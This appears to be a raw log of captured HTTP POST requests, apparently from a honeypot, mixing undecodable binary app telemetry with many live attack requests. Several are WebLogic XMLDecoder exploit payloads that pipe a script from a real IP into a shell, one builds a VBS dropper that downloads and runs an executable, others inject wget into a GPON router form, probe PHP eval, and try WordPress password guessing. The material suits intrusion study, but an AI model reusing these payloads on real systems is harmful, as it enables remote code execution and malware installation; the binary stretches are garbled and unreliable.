1.0517e9b7f56240b158d00af66@2a5557b6525c7ee069ecfe09c5af4174433522e955975e55361aaa93d1893159 ÷˘¶ì ËQÉxú≠Xks⁄H˝+)>Ìn\ûÓVÎE’|ê–#8nà@ññ)óêHËA‚°©¸˜Ω-«±ùx ≥ Ö ‘Õ}úsÓÌ€¸Ÿ[TÒπ◊ˇ≥ólΩ˛ˇÏôh†)™ÆPKQâJ ”TË@7
E!ö§⁄mJ„^ø˜)œ£≤w’ªoäm <㙂:OÀMúÏ6ª}ß’ı∂⁄F·˛˙SµÑ{ÿΩflı˙ò™í®`Å,ê´ûëÓ∂` æ/Ùæ^]ú( UB?òˇÉ;êHAV®®K5ES&Îä•àï-]J“Æ™UûL¬}Úœ#EUQ(ÜDπùœ˚∞ÜïÔQ],aQ"î*‰û¥3ˇ©NvªÓ”’Â\â¢å5ˆœM=ÖvqÛœ
ò`Y˝öN &’1&Ü¢Úˇ"!íÖ®NëEk†Àöv9¡SUAD‰WIEß∫N4Àh A,Î2’LCî/ÖÑAˆ*_»D~!˘B2·ÆD$ “•xÉ™,#Ex;·˛q’€AiUÓ:§¬f_m√UÚâøª”_YÜQ≤®™ÕuÔÆ5XM (qí˝±™7Z¥OÈ˛ ≈MÓ¡YØØÖg˜˜<|OËÈ˚òìLx¸@oäÚÑ˛±øflßùØo∫íLe¸Éa¨™
`WáÀeÒW«2ج¯˛˚3,BU`Ò™◊l_.Hº˜ìØWΩ§å• ÅJ*¯˙Ò˝´ÏÒC¸ ^1)PEïÖ_‰DPÅ÷GNfi<,^„ј|IF/9°≤à©'
∆T¡?s%Í+úà·—Àp“H@˘¢¥P8≈OuÚ÷îÚ'
&"û¸dX@ÁÑOíD…e8È≤.
®pRıI‰où?Ø
Ìò
*í…œÜÈ€Ä*2í_†‚œÄÚ÷ØKó¥ í+ Ì≠ì0NjË2LÛ$æØì/M≤„ß#ÏFî˚]≥ÿü∑‹—áœü¥˜`-‹n7 ?ÅD,'ÍB^Ú±-∞®ƒÖKIzÿsHÍ]Á¥GÆÒ5 ŒŸ*o"Èaï†ˇ`h1∞mÎ}T≈‡â悉êF…}rÿÃÜÔË≠kÚ3∞i´∂…flw="ñQ]¡ûÌÖ®ØH˝HÍ´J)ÙïòüÓ≈∂NÀ=üoè
”˝‹M∂ oÍÆâFÆOX¶ùG∆̓≤ç∑˙ÚÒ äwˆ`]0˜f∏‰xC¡w≠µì≈≈»òR«àNÛ“Ò&ÖüçEøò û˙Ìò¯fik∫≥]îÚΩ”ÓéX«»RIpw”Üû⁄ÿ⁄Ù|õô
[/¬∂˛"f≥»ˇhO6ÛíµXõ•#{R8Ÿ1√l˝6/|óùXlXô}ìçåY&afiT3HfiD¬dΩ∞OKü¨◊ãBÃ˙Í„ºúıêS>µOÎdÚ“◊£'øù¨ ,ã∫Ïù6"¨ùmXsZßl÷2èâÛ2pß⁄‡ofÚh›q«gÊöB`[i`Ãrflõ@Ï Å5€lœ<è<≤õ“ëaj¶˝î |=2d∂√#s£=3|x±36k«í„Æ<≤ì§yŸ¯òsµ v
ä!ˆ≥©Ëx>p4=;ÓzÌ∏˘ö_¿2u≤à¿:Ú›ï8Ú÷¥Ì!¬O9ÕK»
›f„∆—ˇ"+cù:‰fÌxcò°¿ëCÄ{¬∞”öfi<:ŸÙfiµy©›˘æÓö{vF≠µØGM]8≥”™
Ï1 §†´33&˘»ùÅŒ÷©O|`A_;êãc;©ìY9d÷"
YivX‰(∂gg[∂l™/µüÂ<Fˇƒ
,ç1hbÌ∫p¿∫OÄ œŸ¸√6L¬Y∞÷∞K”?È°7ˆ?c¡io
ÿŸ>yV ä)
ä0ú¨GdÔ1ƒN?#3/96AÁN1Ÿ¯YºÜJ:ç @fi ¿?0íM ´2섶ȃ©|OlÔË6ÒaA‚]0”w˛›∆õóúŸüyÉÏ&cô)pÑ!F *¬#îkòÁ¿BΩÃ
ßòÂövjX-B‡u^∆ñzªæ&‰yÙJÙ؆fhh®8™Ω’pP¯âìÔn Ê
ʵ,xæfçᲖ∞2÷˙àÅ|W/€u`˚-œgô„ZXÇû2Ÿh⁄Ôøœ˘M˙Í}µ{l]l8v
ÚÀ∑ÊO(Ã∞QX◊)Ô–=◊º˝8büÕ€ßo>µ◊YwJ=\)óM˛¨çãfl[‰¢
k~fi±œåè9=wüFa~ˇ–fiüı‹∞l‡>∞oÍŒı]VE⁄]ç¯qm“r’5–ê
´ >‹Bo≤‰¬1⁄ „ÚgÖIô1¶@
÷ TKfi-¿<”Vö±¨Ã÷-(ƒ
äpõ9Ymedl ÷V4– ≥›vDfÁ–≥v∂∂¬ ^(ˇ8ö,Ë≥=f»õÔdµ»a,Ä5èÌo“4NÖ[^¸≠∂πA;éæ;ôª¨√‡∞ı(ƒÈ@”f€¿∆g≤J†V¯–ÖÚ»|—áÚ ‹I&Ü≤Abö|k>?≥¿’lkk
o/êΩdÉó«äÈΩˇ¯>üó)≈w ÕµNøzje\Wi¸Ì‰‹•´2‰¯Ûã≤––æ@˙ä—∑P_V˙HËÀF_¿}"˜ë‘7}ÕÍKÉæ!˜Xà∂
∑8a˘›ß∫‚™®Íwurxáfl˝Î ÁˇÓFâhÛwf.¨xÛLk“5∫Êó†oZÈf(¯"¡Öí~Z]‘a?óP¯¯≥±Áø 6∂j }Õßâ°—ÅÒÃΩÜøNxE,¬ÁXñ…íÜÇ≤î‘pA∫\Ü"
’d!FT‡n.«èY}üx
flÜò'†ü©ΩÀ‚£;UËßnzàä2ÍÊÑ˘tíᙥ‡Q ã÷aYvc…√Ød¸vˇ“‡C
√8(
T¿î Ñæ~˝0¥å”@418b9bb61ad7d2e02767b70975247d7436bed9e9f11c41554191039373020500 cd5fff46f7c64f24d9f26bbc314d13cf
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
Bw22mXUXA4ZNHsUp4KG6fWZBhuyiwPMMIVwuh3pk8gPzeg7PFI/EPtOV2jE9fsIz0tk/DBYiU7WMfP1Cjs9yzmva00fjmn8i/aLNlU/LZ5/iwFIXFBwMssKtEKi5sub2TJ1qXE3TLEskQX1A+fpcznkLPfaA6BwpLWSNvGh52inn/HtvXMAQtB7MJYbOAQMkihynUSDw4/qyXeJC1zbzWtpSzoNvGt5Xxxr1LCkMydjPwEo7m0AcUjGG7w6F9zlhXsfzUa4d1/vSLn7hOg3Y6/dusgC14nPBo6RY3sffNuHIfYQW7GVbLX0Lou9BthIPgRI7KUQcxNfEdDZAM4yL563dqUPN/bXGrON0q4HzeLC+D2ndFUJV3Nty
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1031
Content-Type: multipart/form-data; boundary=lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
706169
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
754fa4f1e226c43b298238c2739d4278
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /CGI/Execute HTTP/1.1
User-Agent: curl/7.35.0
Host: x.x.x.x
Accept: */*
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
XML=%3CCiscoIPPhoneExecute%3E%3CExecuteItem%20URL%3D%22Dial%3A00%22%20Priority%3D%220%22%20%2F%3E%3C%2FCiscoIPPhoneExecute%3E
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=456456
POST http://behacdn.ksmobile.net/adsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 78
Ns}›~ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpj@WTıÖƒ¶µy¥LRÖÕ_?⁄ÀhX{$∑ãÑç"–JÛ∑
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496391414215
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2493
1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959éà¶Äì ‰VÊxúÕWks¢ ˝+)?›{ON•Í|hÂq0ÈftP“\OY( ɯĩ˘Ôwc2â3ôì˚ò∫ßíîïÿ¥{Ôfik≠Ω⁄œùe‘Âsgø À4<ÑiGÈùÎN∏9tî~Óp]]ì˚¬†è@√™."±œı’ûx˛A“yS¿ß / µ<XUîˆyQf^
Å˚lõ√#ÿ·ŸMØVaÊ~XÖyñ«(Ƭõ›&.´õ¢\fl¯Ö_ÏPp∫Ò∑€º›bøäqUC§j◊Qx±fl«À}ıØúSÈtæ\?U‰ìpWyee¬ÚˇVMOÏÒË˙ªdóe¥u~jü¸5›ÈI®À]ˇY÷Ô ˚´@CHÊ≈fi{
°>‚≈˜‘”ö,…›ÓªMÓıªÚ;MÓãr˜›Å&BW‰fi h/Û<˜~@Éz§fi€†˝ÒÂèÎŒ˙ø∂¿GΩ>õÈ‚“MÉ}GÅ|]‚âØf6ÿ»uTÌaô{nŒø ÏKØä㺣à\Øù odA‡ "ˇíÂW˛?NsUz5∫$˘gkó8ô;ã,vEÈßkÔæR∞pı©]¯nÔÕ,览ÜìµÀØà èü´]ÊπƯvñ^O˙ÆÔ è/◊ù(ÙÇV»ü;+/N√`QÜ{P¯Óú¬Û˝p∑[ψÀ™fi∂˛˝”G¸ ш∂€MwŒé‘ıºPÏÖ!∑í$/{«Ò"Z=ÓY¿êÿùKÏ=X*√]ëÓ´ßï>‚˛¡s=<Ì[¯Eix"±.2XhœDÃ+ÒŒ÷⁄S≈Yÿ9lìüw}/^ÓóÏ…|xÁqJØ´¯]•flSVÇ“ ‡AúmÀ8Ø⁄qu2»@‘Ó˝dªt¶Lµ5Œ≤YC‹õÒ◊·®±fiß{c∏>Y™èX≥Ê “j“¨ñç¢˙'◊—–<wv≤úY‚™4•ÜâàJÍê∆Èë›ß´•1CÆsdU_A$g˛°Ù∏L‹BË(q≥YÊ"éŸÉ5Û‹RiÏ™º‹»r∆'í¯Çõh"I¶¢kOOÆ:ãÒÄnó9Âòs⁄›#˝ËÎ}‰fièœÈÔ
lû¨ÅwõS˘nû«3ü›™>œÏŸÜ6ABT,±dQÉà‘ãñç!H¶At&gCO,õ‡·wëÁ˘eÏWëS¢Í¥!ŸXtì5‘LjÇF Mhô†©>≤Sd√™0JÁπoÙÎ@Ô√I&©üª—r∞B=Nºm¬ZL€÷ ‘—xWıÜLƒl_Ä<U≙:dÖhÕXbÕ,ûÁ i'7”‡4⁄„ øt“ç1ƒQ”‘UaΩÅgt√ö0{ 1{√S{≥ƒDñÌ◊ÏÙrÆy~y2WÏ
"à Æäkö—ƒu∆µeÃñÈÙÙDåQ 
ÖAŒæE0,© OÀ8Öû4sw√lvÇà»24Åf‰Hù±Ha›R◊"m÷'ÜH˚:ÓçÂ@‰¸≤f5CSÜm
»twA&ÁâLˆÊ≈4§ "7â™2ë&&ÁfnLUÌË™¶@Ï b6çÊ9∆˝ 2—Ç9“˛Ã◊iüÛåY≠æ∞€èfßuAõYÖ
—‘RGÌÿ∂Ö®z¬úÈqûC#2`¡´∂‘
Á⁄iD«ÿ
]™r.j¢j¬ùç˘;€îÙCç™—˛∂猖,u≥ID
4∑ë@[Í$µhqbâ
yç#™y"Ÿîgh õä‰à≠sta÷@€üıÜÅJflh
¬=´mz§j∫° ë(ÇF9¶ƒÏ4Ö^ PEœ`˝ƒl=√É¡E{&Q`Ã8œ·Åø∆Ä\E4A[V2FVBö7ç Í0…r«íqMìuM=. P !íçR“l$¯_r1æ]
td≥⁄GÈa≠u:πªd¸cÖ4∏°P/…L‡k¶'`zFIM7‡n•o¢cxz∫≥IEN¢h{»‰‘ fO™KÇÑ"ò6;ã# TFõAJ≥1VÔGÈì¢èKt⁄2a∞Wµ∂†∂’jhΩvÆ
cDA”§:5¥sC*fç±˚‡›O8˜fid81EΩR'≈›i{ µŸÎV?0Õ(ÙŒ<R4â]9öd,õÄVP)‘'iª∆ø3EÀLJaÍX–ï
(¥Ö⁄êƒÖ˜ÉÙ££9i!ãúŸVe Ü<∞Ù?fL†6üß¿&t%
Ljuz.4Æ⁄ö¡¥ÜÛÅÓÒ`:уπ∆X¢ô≥ñ[-fl_lÁ£eCWÌ…Ê&º7y®Î∑y^ƪ(v_ΩçòSÛφã÷;
íãˆΩ≤åØ‚œyq›ô|^=€¯jü^∏{˜≈cóÖW∂ÚâÙ˙≤¯h«UÏ{È‚—ˆ˘;ˆÚ˝ Û´}yNy{E∑æ,™“Û7qænΩıËêa¶Ô›flGœô¨<gÑ<æ5¢é¡ 4ŒçºOÛAÎfxç’•£'∆@èàZ¿∞⁄ÇoRÎÜ€å4Ö˺‚rª·£YÌ9˙Œ¿Îvú®¡é÷‰€òê±…f™/–§UhØ"∂—!«Y∆¥E¥¡ ë¬é#Éë‘2Jfl™}·÷˝Náœ∂Æ¡oËdΩŒìZ? 5pØ%.∏%` SXlOè,3AŸpT‚<ø`ÈΩ>6±1>‚3∂ –¡yPqtU⁄≈΋k ODQëÜäÆ)í®®ú"ÀJ+=]A]E(CNDEP‘Wd§à‡o˜mƒ 9»WÀ¢≈ª(Ø p≈_˝Ì ßá=[»[ø‹ñfi˛2÷'ÿ\p©{√›Ù;œT8flQt«˙ ™“ÀÉKé<^&aÛÇ—]ÏÛ™lØë¶zn E6Ò~œÃ ¯v÷Åoka¿Ûê@(OΩæ$qÀ%͈e‰∑â„›6ıÍØÁ§Öøπ˙∏oö4ºÖ«Ûe∫=“”]ˆ•˝‰>üÍ÷ûˆƒèÁ{§ü²£∂R/_Ô°}.n!Ù#/œœwSflÀ∂†◊∆˝Õ˚6fi£VyQîQÄã1«q_æ¸ •óÛ@6376e5d0bc8bc8303a9eb2e52bc143eb1c31c68a2126ea18bb1b55e0840f1900 36c205d54670cef71307d30ea9d92ef1
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0
POST http://t11.proxy-checks.com/favicon.ico HTTP/1.1
Host: t11.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 215
◊ ™∏—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJE‰ßB‹ßejÅÓMúyíi∆Ÿ‰—:Æ·ó‚† (µ÷a(8x[lïAéG÷ŸpŸ0U¢±±U¨Œ§\e2.fYîœ)Ú }JüHì›˛^&nc˘s ı짩^ª.≈9÷I ’Ÿ P"µ⁄îr’´T*√îtflùÅËLXFÉ5¿îÊ1ë√Ó€}i$X9·X™v≈õflˇD‡ßßz ◊¯)P0—Ú-ô]À?6
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=KJDF403KJ
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
